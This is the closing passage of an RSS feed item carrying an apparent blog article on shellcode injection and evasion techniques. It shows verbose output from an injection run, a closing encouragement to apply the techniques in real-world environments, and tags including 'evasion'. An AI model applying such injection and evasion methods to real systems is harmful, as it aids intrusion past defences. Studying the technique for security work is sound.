&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;memory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;reserved&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;at&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;0x03BE0000&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Emitting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;32-bit&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;assembly&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;call&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;stub.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Thread&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;call&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;stub&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;memory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;reserved&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;at&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;0x001B0000&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;injection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;complete&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;The techniques themselves are static; creativity in their application is paramount. I trust that this article serves as a catalyst for further exploration, encouraging practitioners to combine multiple techniques with ingenuity to achieve their desired outcomes in real-world environments.&lt;/p&gt;

</description>
      <category>shellcode</category>
      <category>cybersecurity</category>
      <category>evasion</category>
      <category>techniques</category>
    </item>
  </channel>
</rss>
